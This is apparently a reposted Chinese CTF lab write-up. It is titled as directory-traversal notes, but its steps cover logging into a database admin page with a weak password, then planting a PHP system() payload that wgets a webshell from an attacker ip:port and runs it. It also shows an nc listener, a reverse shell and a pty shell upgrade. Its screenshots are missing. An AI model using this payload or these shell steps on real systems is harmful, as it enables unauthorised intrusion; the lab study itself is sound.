• ctf-web-目录遍历(拿到www-data用户权限)注入思路笔记


    目录遍历漏洞介绍

    路径遍历攻击(也称为目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(..)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

    需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。

    这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

    注入步骤

    1. 信息探测:
      1. image
      2. 发现数据库管理界面image
    2. 漏洞扫描
      1. 使用owasp-zap进行扫描
        1. image
        2. image
    3. 敏感页面上传、执行shell
      1. -- dbadmin敏感目录有敏感页面,浏览器访问,使用弱口令尝试登陆;发现弱口令存在,并登陆成功!
      2. 生成webshell:
        1. imageimage

      3. 登陆页面之后查找可利用的写webshell的点;
      4. 新建数据库,数据表,字段(写入<?php system("cd /tmp;wget http:/ /ip:port/webshell.php;chmod +x webshell.php;php webshell");?> )
        1. image
        2. image
      5. 创建服务器用于靶场机器下载对应webshell:-- python -m "SimpleHTTPServer”,注意服务器端口和shell地址端口一致
      6. 创建监听:启动监听nc:nc –nlvp  端口号
      7. 执行shell:image
      8. 获得反弹shell
      9. 启动终端优化shell:python –c ‘’import pty;pty.spawn(‘/bin/bash’)
    4. 小结:
      1. image
  • 相关阅读:
    函数—函数进阶(二)
    函数—函数进阶(一)
    函数(三)
    函数(二)
    函数(一)
    人丑就要多读书、三元运算、文件处理
    第二章练习题
    Python bytes类型介绍、Python3与2字符串的区别、Python3与2编码总结
    进制运算、字符编码、Python3的执行流程
    去除inline-block元素间间距,比较靠谱的两种办法
  • 原文地址:https://www.cnblogs.com/zw7889/p/13594878.html
Copyright © 2020-2023  润新知